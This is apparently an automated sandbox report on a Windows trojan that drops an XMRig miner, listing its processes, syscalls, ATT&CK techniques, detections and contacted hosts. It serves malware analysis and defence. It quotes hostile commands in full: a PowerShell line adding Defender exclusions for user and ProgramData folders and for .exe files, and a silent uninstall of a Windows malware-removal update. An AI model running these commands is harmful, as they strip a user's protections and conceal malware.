Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF72877D480 HeapAlloc,GetProcessHeap,HeapAlloc,

0_2_00007FF72877D480

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF72878D6F0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF72878D6F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF72878D894 SetUnhandledExceptionFilter,	0_2_00007FF72878D894
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Code function: 18_2_00007FF63B55D894 SetUnhandledExceptionFilter,	18_2_00007FF63B55D894
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Code function: 18_2_00007FF63B55D6F0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_00007FF63B55D6F0
Source: C:\Windows\System32\conhost.exe	Code function: 23_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	23_2_0000000140001160

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\file.exe	NtProtectVirtualMemory: Direct from: 0x1BB8028DA11	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtAllocateVirtualMemory: Direct from: 0x7FF728771317	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	NtProtectVirtualMemory: Direct from: 0x122A433DAFF	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	NtReadVirtualMemory: Direct from: 0x7FF63B542BC8	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtProtectVirtualMemory: Direct from: 0x1BB8028DA51	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtAllocateVirtualMemory: Direct from: 0x7FF728772E1C	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	NtProtectVirtualMemory: Direct from: 0x122A433DD06	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtQuerySystemInformation: Direct from: 0x1BB8028A570	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtCreateThreadEx: Direct from: 0x7FF728772EBE	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	NtProtectVirtualMemory: Direct from: 0x122A433DB8F	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	NtAllocateVirtualMemory: Direct from: 0x7FF63B5438D8	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	NtProtectVirtualMemory: Direct from: 0x122A433DAC2	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	NtWriteVirtualMemory: Direct from: 0x7FF63B542E46	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtAllocateVirtualMemory: Direct from: 0x1BB8028BC38	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtDeviceIoControlFile: Direct from: 0x7FFDB4404B5E	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtAllocateVirtualMemory: Direct from: 0x7FF728772B86	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtProtectVirtualMemory: Direct from: 0x1BB8028DC18	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	NtProtectVirtualMemory: Direct from: 0x122A433DCC9	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtProtectVirtualMemory: Direct from: 0x1BB8028DC58	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtQuerySystemInformation: Direct from: 0x1BB809813FD	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtProtectVirtualMemory: Direct from: 0x1BB8028DAFF	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	NtProtectVirtualMemory: Direct from: 0x122A433DA11	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	NtProtectVirtualMemory: Direct from: 0x122A433DC58	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	NtAllocateVirtualMemory: Direct from: 0x7FF63B541317	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	NtAllocateVirtualMemory: Direct from: 0x7FF63B542E1C	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	NtProtectVirtualMemory: Direct from: 0x122A433DC18	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	NtAllocateVirtualMemory: Direct from: 0x122A433BC38	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	NtAllocateVirtualMemory: Direct from: 0x7FF63B542B86	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	NtQuerySystemInformation: Direct from: 0x122A433A570	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtProtectVirtualMemory: Direct from: 0x1BB8028DAC2	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtProtectVirtualMemory: Direct from: 0x1BB8028DB8F	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtProtectVirtualMemory: Direct from: 0x7FF728772E73	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtProtectVirtualMemory: Direct from: 0x1BB8028DD06	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtAllocateVirtualMemory: Direct from: 0x1BB809878EC	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	NtQuerySystemInformation: Direct from: 0x122A492134B	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	NtAllocateVirtualMemory: Direct from: 0x122A433A43B	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	NtProtectVirtualMemory: Direct from: 0x7FF63B542E73	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtProtectVirtualMemory: Direct from: 0x1BB8028DCC9	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtQuerySystemInformation: Direct from: 0x1BB8098134B	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtAllocateVirtualMemory: Direct from: 0x7FF7287738D8	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtWriteVirtualMemory: Direct from: 0x7FF728772E46	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	NtProtectVirtualMemory: Direct from: 0x7FFDB43E26A1	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	NtCreateThreadEx: Direct from: 0x7FF63B542EBE	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	NtAllocateVirtualMemory: Direct from: 0x122A49278EC	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtProtectVirtualMemory: Direct from: 0x7FF728772BFA	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	NtProtectVirtualMemory: Direct from: 0x122A433DA51	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtReadVirtualMemory: Direct from: 0x7FF728772BC8	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtProtectVirtualMemory: Direct from: 0x1BB8028D988	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	NtProtectVirtualMemory: Direct from: 0x7FF63B542BFA	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	NtQuerySystemInformation: Direct from: 0x122A49213FD	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	NtProtectVirtualMemory: Direct from: 0x122A433D988	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	NtAllocateVirtualMemory: Direct from: 0x1BB8028A43B	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Thread register set: target process: 504			Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Thread register set: target process: 2120			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\notepad.exe notepad.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Process created: C:\Windows\System32\notepad.exe notepad.exe	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe	Jump to behavior
Source: C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	Process created: C:\Windows\System32\conhost.exe conhost.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF72878D5CC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF72878D5CC

Source: conhost.exe, 0000001A.00000002.3410809736.0000010D5408C000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: procexp.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	11 Windows Service	11 Windows Service	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	111 Process Injection	11 Disable or Modify Tools	LSASS Memory	241 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Service Execution	Logon Script (Windows)	1 Abuse Elevation Control Mechanism	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Native API	Login Hook	1 DLL Side-Loading	111 Process Injection	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	1 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 File Deletion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	45%	ReversingLabs	Win64.Trojan.InjectorX
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	100%	Joe Sandbox ML
C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe	45%	ReversingLabs	Win64.Trojan.InjectorX
C:\Windows\Temp\gtebvdararzg.sys	5%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://xmrig.com/docs/algorithms	0%	Avira URL Cloud	safe
https://172.94.1q	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false		unknown
pool.hashvault.pro	45.76.89.70	true	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://172.94.1q	conhost.exe, 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://xmrig.com/docs/algorithms	conhost.exe, 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.76.89.70	pool.hashvault.pro	United States		20473	AS-CHOOPAUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1458484
Start date and time:	2024-06-17 18:14:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.evad.mine.winEXE@38/12@1/1
EGA Information:	Successful, ratio: 75%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target conhost.exe, PID 2120 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
12:15:05	API Interceptor	1x Sleep call for process: file.exe modified
12:15:07	API Interceptor	28x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
45.76.89.70	has.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	8R83Xif7hH.exe	Get hash	malicious	Phonk Miner, Xmrig	Browse
	dsf.exe	Get hash	malicious	Xmrig	Browse
	633.exe	Get hash	malicious	Xmrig	Browse
	setup.EXE.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	setup.exe	Get hash	malicious	Xmrig	Browse
	setup.exe	Get hash	malicious	Xmrig	Browse
	KfG6A72lQ1.exe	Get hash	malicious	Xmrig	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
pool.hashvault.pro	https://oxy.st/d/SmUh	Get hash	malicious	Xmrig	Browse	45.76.89.70
	has.exe	Get hash	malicious	Xmrig	Browse	95.179.241.203
	zTMEFv0Dh3.exe	Get hash	malicious	Xmrig	Browse	142.202.242.45
	SecuriteInfo.com.Win64.Evo-gen.4435.12354.exe	Get hash	malicious	CryptOne, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse	95.179.241.203
	file.exe	Get hash	malicious	Xmrig	Browse	95.179.241.203
	file.exe	Get hash	malicious	Unknown	Browse	45.76.89.70
	6Yl34Sv8ZJ.exe	Get hash	malicious	Xmrig	Browse	45.76.89.70
	file.exe	Get hash	malicious	Xmrig	Browse	142.202.242.43
	http://5.42.66.10/download/123p.exe	Get hash	malicious	Xmrig	Browse	142.202.242.43
	file.exe	Get hash	malicious	Xmrig	Browse	142.202.242.43
bg.microsoft.map.fastly.net	https://www.sitesofconscience.org/	Get hash	malicious	Unknown	Browse	199.232.214.172
	DHL Package Documents clearance.exe	Get hash	malicious	AgentTesla	Browse	199.232.214.172
	https://agrtq.qc.ca/	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://careertech.org	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://www.wiley-epic.com/	Get hash	malicious	Unknown	Browse	199.232.210.172
	LIHTCPUB_BIN.ACCDB	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://mattressashamed.com	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://olivine-geode-arrow.glitch.me	Get hash	malicious	Unknown	Browse	199.232.210.172
	file.exe	Get hash	malicious	Vidar	Browse	199.232.210.172
	file.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-CHOOPAUS	SHIPPING_DOCUMENTS.exe	Get hash	malicious	FormBook	Browse	45.77.25.52
	SHIPPING_DOCS.bat.exe	Get hash	malicious	FormBook	Browse	45.77.25.52
